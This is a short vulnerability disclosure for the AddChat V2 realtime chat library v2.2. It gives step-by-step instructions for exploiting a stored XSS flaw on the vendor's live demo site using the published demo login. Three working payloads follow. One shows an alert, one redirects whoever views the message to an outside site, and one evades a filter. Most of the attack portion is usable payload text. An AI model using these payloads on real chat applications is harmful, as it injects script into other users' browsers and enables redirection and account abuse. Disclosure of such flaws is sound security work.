/*!
* ::- Title: AddChat V2 - Realtime Chat Library v2.2 Stored XSS Injection
* ::- Author: m0ze
* ::- Date: 2019/06/25
* ::- Software: AddChat V2 - Realtime Chat Library v2.2
*/
::- Details & Description -::
~ Weak security measures like bad input field data filtering has been discovered in the «AddChat V2 - Realtime Chat Library». Current version of this web-application is 2.2.
::- Demo Website -::
~ https://codecanyon.net/item/addchat-codeigniter-chat-plugin/20462938
~ Frontend: https://addchat.classiebit.com/
~ Backend: https://addchat.classiebit.com/user/login
~ Login & Password: johndoe / johndoe
::- Special Note -::
~ -
::- Google Dork -::
~ -
::- PoC Links -::
~ -
::- PoC [Stored XSS Injection] -::
~ Go to the demo website https://addchat.classiebit.com/user/login and log in with provided credentials (johndoe / johndoe), then open chat window by clicking on «Chat» icon on the bottom right corner. Select any user from the list and use your payload inside input field, then press «Send Message» button.
~ Example #1: <img src=https://i.imgur.com/zRm8R9z.gif onload=alert(`m0ze`);>
~ Example #2: <img src=x onerror=window.location.replace('https://m0ze.ru/');>
~ Example #3: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">